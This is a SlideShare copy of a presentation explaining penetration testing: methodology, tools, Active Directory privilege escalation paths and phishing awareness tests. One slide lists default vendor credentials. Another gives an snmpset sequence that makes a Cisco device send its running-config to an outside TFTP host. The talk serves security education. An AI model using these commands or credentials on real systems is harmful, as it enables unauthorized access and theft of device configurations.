SlideShare a Scribd company logo
Penetration testing What’s this? Dmitry Evteev  ( Positive  Technologies)
Penetration testing internals Penetration testing  !=  simulation of (un)real  attacker  activities Penetration testing  !=  instrumental scanning with manual vulnerability verification Penetration testing  – is a complex of activities aimed to estimate current security process status; is a testing of protection bypassing; is one of security audit methods.
Methodology On the one hand,   the following best practices are used: Open Source Security Testing Methodology Manual (OSSTMM) Web Application Security Consortium (WASC) Open Web Application Security Project (OWASP) … On the other hand, the following standards are used: Center of Internet Security (CIS) guides ISO 2700x series standards  …
Abilities Protection mechanism   N … X Incident management Some activities were detected but not identified as an attack . 2 Protection mechanism N … X
Aims High-level Internal policy  ( pentest as an instrument of pressure ) Estimation of current security processes Should be done  ( compliance ) Technological Get unauthorized access to internal network from the Internet Gain maximum privileges in main infrastructure systems  ( Active Directory, network hardware ,  DBMS ,  ERP, etc. ) Get access to certain information resources Get access to certain data  ( information )
Approaches Perimeter pentest  ( with further attacks in internal network ) With or without administrator awareness Wireless network security analysis Internal pentest From average user working station From chosen network segment Certain information system component testing  ( security analysis ) Black, Grey and White Box Assessment of employee awareness in information security
Real attack VS penetration testing For direct executor pentset is HACKING ! Limitations Compliance with Russian Federation legislation Limited time Minimum impact No testing like DDoS Inconveniences Coordination of actions  ( it can run into a very absurd extreme !) Responsibility/Punctuality Advantages Do not need to hide the activities Simplify the network perimeter identification process A possibility to use Grey and White Box methods
Instruments Positive Technologies MaxPatrol Nmap/dnsenum/dig … … Immunity Canvas (VulnDisco, Agora Pack, Voip Pack) Metasploit … THC Hydra/THC PPTP bruter/ncrack … Cain and Abel/Wireshark Aircrack … Yersinia … Browser ,  notepad …
web application security problem The most frequent web application vulnerabilities detected by “Black Box” method  ( 2009 statistics ,  http://ptsecurity.ru/analytics.asp )
Pentest example: web applications What is web application pentest by BlackBox method? (real world) web server auditor working station Check  1 Check   N Vulnerability is detected Vulnerability  1:  password bruteforce Impact:  access to application  ( with limited privileges ) Vulnerability  2: SQL  injection Impact:  file reading only  (magic quotes  option is enabled ) Vulnerability is detected Vulnerability  3:  path traversal Impact:  file reading only  ( potentially  LFI) Vulnerability  4:  predictable identifier of loaded file Vulnerability  3 +  Vulnerability  4 = Impact:  commands execution on server Next step  –  FURTHER ATTACK
Weak password problem The recommended password policy is used What is domain administrator password? (coincide with login)
Pentest example: Password bruteforce  ( defaults ) Well known admin:123456 Administrator:P@ssw0rd … SAP (DIAG)  SAP*: 06071992, PASS mandants :   000, 001, 066,  all new (RFC)  SAPCPIC: ADMIN mandants  :000, 001, 066,  all new … Oracle sys:manager sys:change_on_install … Cisco Cisco:Cisco … …
Pentest example: Hello, Pavlik :) snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.2.31337 integer 1 snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.3.31337 integer 4 snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.4.31337 integer 1 snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.5.31337 address <tftp_host> snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.6.31337 string running-config snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.14.31337 integer 1 snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.14.31337 integer 6
The problem of access control Network access Network architecture  ( DMZ ,  technological network ,  user segment ,  testing environment ) Remote network access Data access Shared resources  ( password in clear text ,  data backup copy ,  different sensitive data ) Web applications ,  DBMS ,  ERP
The problem of access control Division of privileges among administrators Users with extended privileges Services  (!)  with more than required access level General problem of identifiers management
Pentest example:   Use of vulnerabilities CANVAS && Metasploit
Pentest example: Privilege Extension in   Active Directory Version  1 : Password bruteforce Version  2 : Vulnerabilities in controller domain services Version  3 : Pass-the-hash attack Version 4:   Create new user from domain computer Version  5 : Conduct attack  « Poisoning ARP cash » ( for example ,  hijack RDP session, lower authentication level to LM ) Version 6: NTLM Relay attack Version 7: Find and restore system state domain  ( for example ,  after successful attack on backup server ) Version  8 : Get extended privileges owing to other systems  ( for example ,  control items in company’s root DNS ) Version  9 :   Get extended privileges via other systems’ vulnerabilities  ( passwords are stored with reversible encryption ,  insecure protocols are used, etc. ) Version N …
Pentest example: Security analysis Network scanning Password is bruteforced ! Exploitation of SQL Injection Command execution on server Privilege gaining Internal resources attack Internal   pentest Install MaxPatrol scanner Find vulnerabilities Exploit vulnerabilities Move to network of the Head office Conduct attacks on Head office resources Get maximum privileges in the whole network !
Pentest example: Security analysis
Pentest example:   Wireless networks
Pentest example:   Assessment of awareness program efficiency Send provocative messages via e-mail Send provocative messages via  ICQ ( and other  IM) Distribute data media with provocative messages  Question employees Talks  ( by telephone ,  skype )
Pentest example:   Example of a set of checks Note description Attack Monitored events A note from   authority   with attached executable file . Spread of network worms . System infection with Trojan horse . Open the mailbox . Execute the attached file . A note from   internal person with link to web site .  The link points to an executable file .  Fishing attacks . Spread of network worms . System infection with Trojan horse . Attacks through software vulnerabilities . Open the mailbox . Load file from w eb  server . Execute the file . A note from authority   with link to web site . Fishing attacks . Spread of network worms . System infection with Trojan horse . Attacks through software vulnerabilities . Open the mailbox . Follow the link .
Pentest example:   Assessment of awareness program effeciency Users that follow the link (only 1 pentest) Users that follow the link (regular pentest)
Conclusions Penetration testing –  is a number of activities that allows to make efficient assessment of current security processes Penetration testing –  is search and use of flows in security processes vulnerability management configuration management incident management security management of web applications, DBMS ,  ERP, wire and wireless networks, etc. etc.
Thank you for your attention !  Any questions?  [email_address] http://devteev.blogspot.com/

More Related Content

What's hot (20)

PDF
THOR Apt Scanner
Florian Roth
 
PPTX
Tcpdump hunter
Andrew McNicol
 
PDF
BlueHat v18 || Protecting the protector, hardening machine learning defenses ...
BlueHat Security Conference
 
PDF
RIoT (Raiding Internet of Things) by Jacob Holcomb
Priyanka Aash
 
PPTX
Malware analysis
Prakashchand Suthar
 
PPTX
Basic Dynamic Analysis of Malware
Natraj G
 
PPT
BSides Philly Finding a Company's BreakPoint
Andrew McNicol
 
PDF
Malware collection and analysis
Chong-Kuan Chen
 
PDF
2012 S&P Paper Reading Session1
Chong-Kuan Chen
 
PDF
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Priyanka Aash
 
PPTX
Introduction to Malware Analysis
Andrew McNicol
 
PPT
Malware Analysis Made Simple
Paul Melson
 
PPTX
BSides_Charm2015_Info sec hunters_gathers
Andrew McNicol
 
PDF
'Malware Analysis' by PP Singh
Bipin Upadhyay
 
PDF
My tryst with sourcecode review
Anant Shrivastava
 
PDF
Red Team Methodology - A Naked Look
Jason Lang
 
PPT
BSidesJXN 2017 - Improving Vulnerability Management
Andrew McNicol
 
PPT
BSidesJXN 2016: Finding a Company's BreakPoint
Andrew McNicol
 
PDF
Anatomy of a Cloud Hack
NotSoSecure Global Services
 
PPTX
Purple team is awesome
Sumedt Jitpukdebodin
 
THOR Apt Scanner
Florian Roth
 
Tcpdump hunter
Andrew McNicol
 
BlueHat v18 || Protecting the protector, hardening machine learning defenses ...
BlueHat Security Conference
 
RIoT (Raiding Internet of Things) by Jacob Holcomb
Priyanka Aash
 
Malware analysis
Prakashchand Suthar
 
Basic Dynamic Analysis of Malware
Natraj G
 
BSides Philly Finding a Company's BreakPoint
Andrew McNicol
 
Malware collection and analysis
Chong-Kuan Chen
 
2012 S&P Paper Reading Session1
Chong-Kuan Chen
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Priyanka Aash
 
Introduction to Malware Analysis
Andrew McNicol
 
Malware Analysis Made Simple
Paul Melson
 
BSides_Charm2015_Info sec hunters_gathers
Andrew McNicol
 
'Malware Analysis' by PP Singh
Bipin Upadhyay
 
My tryst with sourcecode review
Anant Shrivastava
 
Red Team Methodology - A Naked Look
Jason Lang
 
BSidesJXN 2017 - Improving Vulnerability Management
Andrew McNicol
 
BSidesJXN 2016: Finding a Company's BreakPoint
Andrew McNicol
 
Anatomy of a Cloud Hack
NotSoSecure Global Services
 
Purple team is awesome
Sumedt Jitpukdebodin
 

Viewers also liked (20)

PDF
Penetration testing
Ammar WK
 
PPT
Penetration Testing Basics
Rick Wanner
 
PDF
Segurança no Desenvolvimento de Software
Marcelo Fleury
 
PDF
2016 10 pt kz качалин
Diana Frolova
 
PDF
Современные российские средства защиты информации
DialogueScience
 
PDF
Биография сетевого периметра в картинках
Namik Heydarov
 
PDF
Positive Technologies. Григорий Тимофеев. "Позитивные технологии обеспечения ИБ"
Expolink
 
PDF
Introduction to penetration testing
Amine SAIGHI
 
PPTX
Web application Testing
OWASP Foundation
 
PDF
Nessus scan report using the defualt scan policy - Tareq Hanaysha
Hanaysha
 
PDF
Attack All The Layers - What's Working in Penetration Testing
NetSPI
 
PPTX
Vulnerability Assessment and Rapid Warning System Enhancements in
Keith G. Tidball
 
PDF
Introduction to Windows Dictionary Attacks
NetSPI
 
PDF
Thick Application Penetration Testing - A Crash Course
NetSPI
 
PDF
Application Risk Prioritization - Overview - Secure360 2015 - Part 1 of 2
NetSPI
 
PPTX
Сравнение ТОП 5 SIEM РФ
Pete Kuzeev
 
PPTX
Oss tmm
Yadi De La Cruz
 
PPTX
OSS TMM
Maria Villalba
 
PDF
Infographic: Penetration Testing - A Look into a Full Pen Test Campaign
Pratum
 
PDF
11. wireless-penetration-testing-training-cyber51
Doree Garcia, CCNA, OSWP
 
Penetration testing
Ammar WK
 
Penetration Testing Basics
Rick Wanner
 
Segurança no Desenvolvimento de Software
Marcelo Fleury
 
2016 10 pt kz качалин
Diana Frolova
 
Современные российские средства защиты информации
DialogueScience
 
Биография сетевого периметра в картинках
Namik Heydarov
 
Positive Technologies. Григорий Тимофеев. "Позитивные технологии обеспечения ИБ"
Expolink
 
Introduction to penetration testing
Amine SAIGHI
 
Web application Testing
OWASP Foundation
 
Nessus scan report using the defualt scan policy - Tareq Hanaysha
Hanaysha
 
Attack All The Layers - What's Working in Penetration Testing
NetSPI
 
Vulnerability Assessment and Rapid Warning System Enhancements in
Keith G. Tidball
 
Introduction to Windows Dictionary Attacks
NetSPI
 
Thick Application Penetration Testing - A Crash Course
NetSPI
 
Application Risk Prioritization - Overview - Secure360 2015 - Part 1 of 2
NetSPI
 
Сравнение ТОП 5 SIEM РФ
Pete Kuzeev
 
Infographic: Penetration Testing - A Look into a Full Pen Test Campaign
Pratum
 
11. wireless-penetration-testing-training-cyber51
Doree Garcia, CCNA, OSWP
 
Ad

Similar to Penetration testing, What’s this? (20)

PPTX
Introduction To Ethical Hacking
Raghav Bisht
 
DOCX
Syed Ubaid Ali Jafri - Black Box Penetration testing for Associates
Syed Ubaid Ali Jafri
 
PDF
How to protect your corporate from advanced attacks
Microsoft
 
PPS
Workshop on BackTrack live CD
amiable_indian
 
PPT
Kunal - Introduction to backtrack - ClubHack2008
ClubHack
 
PPT
Kunal - Introduction to BackTrack - ClubHack2008
ClubHack
 
PPT
Windows network security
Information Technology
 
PDF
Network Vulnerabilities And Cyber Kill Chain Essay
Karen Oliver
 
PPTX
Cyber warfare introduction
jagadeesh katla
 
PPTX
Penetration testing
PTC
 
PPT
Redefining Endpoint Security
Burak DAYIOGLU
 
PPT
Sembang2 Keselamatan It 2004
Linuxmalaysia Malaysia
 
PPT
Windows network
Jithesh Nair
 
PPT
Automated Penetration Testing With Core Impact
Tom Eston
 
PPTX
Introduction To Exploitation & Metasploit
Raghav Bisht
 
PPTX
Final project.ppt
shreyng
 
PPTX
Novetta Cyber Analytics
Novetta
 
ODP
Ph d proposal_20070809
Todd Deshane
 
PPTX
Penetration testing dont just leave it to chance
Dr. Anish Cheriyan (PhD)
 
Introduction To Ethical Hacking
Raghav Bisht
 
Syed Ubaid Ali Jafri - Black Box Penetration testing for Associates
Syed Ubaid Ali Jafri
 
How to protect your corporate from advanced attacks
Microsoft
 
Workshop on BackTrack live CD
amiable_indian
 
Kunal - Introduction to backtrack - ClubHack2008
ClubHack
 
Kunal - Introduction to BackTrack - ClubHack2008
ClubHack
 
Windows network security
Information Technology
 
Network Vulnerabilities And Cyber Kill Chain Essay
Karen Oliver
 
Cyber warfare introduction
jagadeesh katla
 
Penetration testing
PTC
 
Redefining Endpoint Security
Burak DAYIOGLU
 
Sembang2 Keselamatan It 2004
Linuxmalaysia Malaysia
 
Windows network
Jithesh Nair
 
Automated Penetration Testing With Core Impact
Tom Eston
 
Introduction To Exploitation & Metasploit
Raghav Bisht
 
Final project.ppt
shreyng
 
Novetta Cyber Analytics
Novetta
 
Ph d proposal_20070809
Todd Deshane
 
Penetration testing dont just leave it to chance
Dr. Anish Cheriyan (PhD)
 
Ad

More from Dmitry Evteev (20)

PPTX
Противодействие хищению персональных данных и платежной информации в сети Инт...
Dmitry Evteev
 
PPTX
penetest VS. APT
Dmitry Evteev
 
PPTX
Уязвимости систем ДБО в 2011-2012 гг.
Dmitry Evteev
 
PPTX
Статистика по результатам тестирований на проникновение и анализа защищенност...
Dmitry Evteev
 
PPT
Реальные опасности виртуального мира.
Dmitry Evteev
 
PPTX
Истории из жизни. Как взламывают сети крупных организаций.
Dmitry Evteev
 
PPTX
Демонстрация атаки на ДБО
Dmitry Evteev
 
PPTX
История из жизни. Демонстрация работы реального злоумышленника на примере ата...
Dmitry Evteev
 
PPTX
Типовые проблемы безопасности банковских систем
Dmitry Evteev
 
PPTX
Услуги PT для банков
Dmitry Evteev
 
PPTX
PHDays 2012: Future Now
Dmitry Evteev
 
PPTX
Такой (не)безопасный веб
Dmitry Evteev
 
PPTX
Собираем команду хакеров
Dmitry Evteev
 
PPTX
Тестирование на проникновение в сетях Microsoft (v.2)
Dmitry Evteev
 
PPTX
Тестирование на проникновение в сетях Microsoft
Dmitry Evteev
 
PPT
PHDays CTF 2011 Quals/Afterparty: как это было
Dmitry Evteev
 
PPTX
Как взламывают сети государственных учреждений
Dmitry Evteev
 
PPT
Введение в тему безопасности веб-приложений
Dmitry Evteev
 
PPT
Практика проведения DDoS-тестирований
Dmitry Evteev
 
PPT
Мобильный офис глазами пентестера
Dmitry Evteev
 
Противодействие хищению персональных данных и платежной информации в сети Инт...
Dmitry Evteev
 
penetest VS. APT
Dmitry Evteev
 
Уязвимости систем ДБО в 2011-2012 гг.
Dmitry Evteev
 
Статистика по результатам тестирований на проникновение и анализа защищенност...
Dmitry Evteev
 
Реальные опасности виртуального мира.
Dmitry Evteev
 
Истории из жизни. Как взламывают сети крупных организаций.
Dmitry Evteev
 
Демонстрация атаки на ДБО
Dmitry Evteev
 
История из жизни. Демонстрация работы реального злоумышленника на примере ата...
Dmitry Evteev
 
Типовые проблемы безопасности банковских систем
Dmitry Evteev
 
Услуги PT для банков
Dmitry Evteev
 
PHDays 2012: Future Now
Dmitry Evteev
 
Такой (не)безопасный веб
Dmitry Evteev
 
Собираем команду хакеров
Dmitry Evteev
 
Тестирование на проникновение в сетях Microsoft (v.2)
Dmitry Evteev
 
Тестирование на проникновение в сетях Microsoft
Dmitry Evteev
 
PHDays CTF 2011 Quals/Afterparty: как это было
Dmitry Evteev
 
Как взламывают сети государственных учреждений
Dmitry Evteev
 
Введение в тему безопасности веб-приложений
Dmitry Evteev
 
Практика проведения DDoS-тестирований
Dmitry Evteev
 
Мобильный офис глазами пентестера
Dmitry Evteev
 

Recently uploaded (20)

PDF
OFFOFFBOX™ – A New Era for African Film | Startup Presentation
ambaicciwalkerbrian
 
PPTX
AI and Robotics for Human Well-being.pptx
JAYMIN SUTHAR
 
PDF
How ETL Control Logic Keeps Your Pipelines Safe and Reliable.pdf
Stryv Solutions Pvt. Ltd.
 
PPTX
Introduction to Flutter by Ayush Desai.pptx
ayushdesai204
 
PDF
Structs to JSON: How Go Powers REST APIs
Emily Achieng
 
PPTX
AI Code Generation Risks (Ramkumar Dilli, CIO, Myridius)
Priyanka Aash
 
PDF
Peak of Data & AI Encore - Real-Time Insights & Scalable Editing with ArcGIS
Safe Software
 
PDF
Researching The Best Chat SDK Providers in 2025
Ray Fields
 
PDF
introduction to computer hardware and sofeware
chauhanshraddha2007
 
PDF
GDG Cloud Munich - Intro - Luiz Carneiro - #BuildWithAI - July - Abdel.pdf
Luiz Carneiro
 
PPTX
Dev Dives: Automate, test, and deploy in one place—with Unified Developer Exp...
AndreeaTom
 
PDF
Economic Impact of Data Centres to the Malaysian Economy
flintglobalapac
 
PDF
Google I/O Extended 2025 Baku - all ppts
HusseinMalikMammadli
 
PDF
Tea4chat - another LLM Project by Kerem Atam
a0m0rajab1
 
PPTX
Agentic AI in Healthcare Driving the Next Wave of Digital Transformation
danielle hunter
 
PDF
Generative AI vs Predictive AI-The Ultimate Comparison Guide
Lily Clark
 
PDF
Responsible AI and AI Ethics - By Sylvester Ebhonu
Sylvester Ebhonu
 
PDF
Research-Fundamentals-and-Topic-Development.pdf
ayesha butalia
 
PDF
NewMind AI Weekly Chronicles – July’25, Week III
NewMind AI
 
PDF
A Strategic Analysis of the MVNO Wave in Emerging Markets.pdf
IPLOOK Networks
 
OFFOFFBOX™ – A New Era for African Film | Startup Presentation
ambaicciwalkerbrian
 
AI and Robotics for Human Well-being.pptx
JAYMIN SUTHAR
 
How ETL Control Logic Keeps Your Pipelines Safe and Reliable.pdf
Stryv Solutions Pvt. Ltd.
 
Introduction to Flutter by Ayush Desai.pptx
ayushdesai204
 
Structs to JSON: How Go Powers REST APIs
Emily Achieng
 
AI Code Generation Risks (Ramkumar Dilli, CIO, Myridius)
Priyanka Aash
 
Peak of Data & AI Encore - Real-Time Insights & Scalable Editing with ArcGIS
Safe Software
 
Researching The Best Chat SDK Providers in 2025
Ray Fields
 
introduction to computer hardware and sofeware
chauhanshraddha2007
 
GDG Cloud Munich - Intro - Luiz Carneiro - #BuildWithAI - July - Abdel.pdf
Luiz Carneiro
 
Dev Dives: Automate, test, and deploy in one place—with Unified Developer Exp...
AndreeaTom
 
Economic Impact of Data Centres to the Malaysian Economy
flintglobalapac
 
Google I/O Extended 2025 Baku - all ppts
HusseinMalikMammadli
 
Tea4chat - another LLM Project by Kerem Atam
a0m0rajab1
 
Agentic AI in Healthcare Driving the Next Wave of Digital Transformation
danielle hunter
 
Generative AI vs Predictive AI-The Ultimate Comparison Guide
Lily Clark
 
Responsible AI and AI Ethics - By Sylvester Ebhonu
Sylvester Ebhonu
 
Research-Fundamentals-and-Topic-Development.pdf
ayesha butalia
 
NewMind AI Weekly Chronicles – July’25, Week III
NewMind AI
 
A Strategic Analysis of the MVNO Wave in Emerging Markets.pdf
IPLOOK Networks
 

Penetration testing, What’s this?

  • 1. Penetration testing What’s this? Dmitry Evteev ( Positive Technologies)
  • 2. Penetration testing internals Penetration testing != simulation of (un)real attacker activities Penetration testing != instrumental scanning with manual vulnerability verification Penetration testing – is a complex of activities aimed to estimate current security process status; is a testing of protection bypassing; is one of security audit methods.
  • 3. Methodology On the one hand, the following best practices are used: Open Source Security Testing Methodology Manual (OSSTMM) Web Application Security Consortium (WASC) Open Web Application Security Project (OWASP) … On the other hand, the following standards are used: Center of Internet Security (CIS) guides ISO 2700x series standards …
  • 4. Abilities Protection mechanism N … X Incident management Some activities were detected but not identified as an attack . 2 Protection mechanism N … X
  • 5. Aims High-level Internal policy ( pentest as an instrument of pressure ) Estimation of current security processes Should be done ( compliance ) Technological Get unauthorized access to internal network from the Internet Gain maximum privileges in main infrastructure systems ( Active Directory, network hardware , DBMS , ERP, etc. ) Get access to certain information resources Get access to certain data ( information )
  • 6. Approaches Perimeter pentest ( with further attacks in internal network ) With or without administrator awareness Wireless network security analysis Internal pentest From average user working station From chosen network segment Certain information system component testing ( security analysis ) Black, Grey and White Box Assessment of employee awareness in information security
  • 7. Real attack VS penetration testing For direct executor pentset is HACKING ! Limitations Compliance with Russian Federation legislation Limited time Minimum impact No testing like DDoS Inconveniences Coordination of actions ( it can run into a very absurd extreme !) Responsibility/Punctuality Advantages Do not need to hide the activities Simplify the network perimeter identification process A possibility to use Grey and White Box methods
  • 8. Instruments Positive Technologies MaxPatrol Nmap/dnsenum/dig … … Immunity Canvas (VulnDisco, Agora Pack, Voip Pack) Metasploit … THC Hydra/THC PPTP bruter/ncrack … Cain and Abel/Wireshark Aircrack … Yersinia … Browser , notepad …
  • 9. web application security problem The most frequent web application vulnerabilities detected by “Black Box” method ( 2009 statistics , http://ptsecurity.ru/analytics.asp )
  • 10. Pentest example: web applications What is web application pentest by BlackBox method? (real world) web server auditor working station Check 1 Check N Vulnerability is detected Vulnerability 1: password bruteforce Impact: access to application ( with limited privileges ) Vulnerability 2: SQL injection Impact: file reading only (magic quotes option is enabled ) Vulnerability is detected Vulnerability 3: path traversal Impact: file reading only ( potentially LFI) Vulnerability 4: predictable identifier of loaded file Vulnerability 3 + Vulnerability 4 = Impact: commands execution on server Next step – FURTHER ATTACK
  • 11. Weak password problem The recommended password policy is used What is domain administrator password? (coincide with login)
  • 12. Pentest example: Password bruteforce ( defaults ) Well known admin:123456 Administrator:P@ssw0rd … SAP (DIAG) SAP*: 06071992, PASS mandants : 000, 001, 066, all new (RFC) SAPCPIC: ADMIN mandants :000, 001, 066, all new … Oracle sys:manager sys:change_on_install … Cisco Cisco:Cisco … …
  • 13. Pentest example: Hello, Pavlik :) snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.2.31337 integer 1 snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.3.31337 integer 4 snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.4.31337 integer 1 snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.5.31337 address <tftp_host> snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.6.31337 string running-config snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.14.31337 integer 1 snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.14.31337 integer 6
  • 14. The problem of access control Network access Network architecture ( DMZ , technological network , user segment , testing environment ) Remote network access Data access Shared resources ( password in clear text , data backup copy , different sensitive data ) Web applications , DBMS , ERP
  • 15. The problem of access control Division of privileges among administrators Users with extended privileges Services (!) with more than required access level General problem of identifiers management
  • 16. Pentest example: Use of vulnerabilities CANVAS && Metasploit
  • 17. Pentest example: Privilege Extension in Active Directory Version 1 : Password bruteforce Version 2 : Vulnerabilities in controller domain services Version 3 : Pass-the-hash attack Version 4: Create new user from domain computer Version 5 : Conduct attack « Poisoning ARP cash » ( for example , hijack RDP session, lower authentication level to LM ) Version 6: NTLM Relay attack Version 7: Find and restore system state domain ( for example , after successful attack on backup server ) Version 8 : Get extended privileges owing to other systems ( for example , control items in company’s root DNS ) Version 9 : Get extended privileges via other systems’ vulnerabilities ( passwords are stored with reversible encryption , insecure protocols are used, etc. ) Version N …
  • 18. Pentest example: Security analysis Network scanning Password is bruteforced ! Exploitation of SQL Injection Command execution on server Privilege gaining Internal resources attack Internal pentest Install MaxPatrol scanner Find vulnerabilities Exploit vulnerabilities Move to network of the Head office Conduct attacks on Head office resources Get maximum privileges in the whole network !
  • 20. Pentest example: Wireless networks
  • 21. Pentest example: Assessment of awareness program efficiency Send provocative messages via e-mail Send provocative messages via ICQ ( and other IM) Distribute data media with provocative messages Question employees Talks ( by telephone , skype )
  • 22. Pentest example: Example of a set of checks Note description Attack Monitored events A note from authority with attached executable file . Spread of network worms . System infection with Trojan horse . Open the mailbox . Execute the attached file . A note from internal person with link to web site . The link points to an executable file . Fishing attacks . Spread of network worms . System infection with Trojan horse . Attacks through software vulnerabilities . Open the mailbox . Load file from w eb server . Execute the file . A note from authority with link to web site . Fishing attacks . Spread of network worms . System infection with Trojan horse . Attacks through software vulnerabilities . Open the mailbox . Follow the link .
  • 23. Pentest example: Assessment of awareness program effeciency Users that follow the link (only 1 pentest) Users that follow the link (regular pentest)
  • 24. Conclusions Penetration testing – is a number of activities that allows to make efficient assessment of current security processes Penetration testing – is search and use of flows in security processes vulnerability management configuration management incident management security management of web applications, DBMS , ERP, wire and wireless networks, etc. etc.
  • 25. Thank you for your attention ! Any questions? [email_address] http://devteev.blogspot.com/

Editor's Notes

  • #12: Легенда: English alphabet characters in lower case, figures and special suymbols Other symbols